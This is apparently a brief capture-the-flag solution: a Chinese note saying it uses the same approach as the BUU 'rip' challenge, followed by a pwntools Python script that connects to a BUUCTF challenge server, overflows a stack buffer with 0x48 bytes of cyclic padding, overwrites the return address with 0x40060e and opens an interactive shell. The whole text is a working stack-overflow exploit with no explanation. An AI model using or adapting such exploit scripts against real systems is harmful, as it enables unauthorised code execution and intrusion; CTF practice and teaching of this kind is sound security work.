和 BUU rip 一样的解法
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from pwn import p64, u64, p32, u32
import os
context.terminal = ['tmux', 'splitw', '-h', '-p', '80']
context.log_level = 'debug'
context.arch = 'amd64'
host = 'node5.buuoj.cn'
port = 28415
fileName = './pwn'
# libcName = './libc.so.6'
# r = process(fileName)
# r = remote('127.0.0.1', 10001)
r = remote(host, port)
elf = ELF(fileName)
# libc = ELF(libcName)
def debug(p, cmd = ''):
if os.environ.get('VSCODE_INJECTION', None):
return
gdb.attach(p, cmd)
pause()
debug(r)
payload = cyclic(0x40 + 8) + p64(0x40060e)
r.sendlineafter(b'\n', payload)
r.interactive()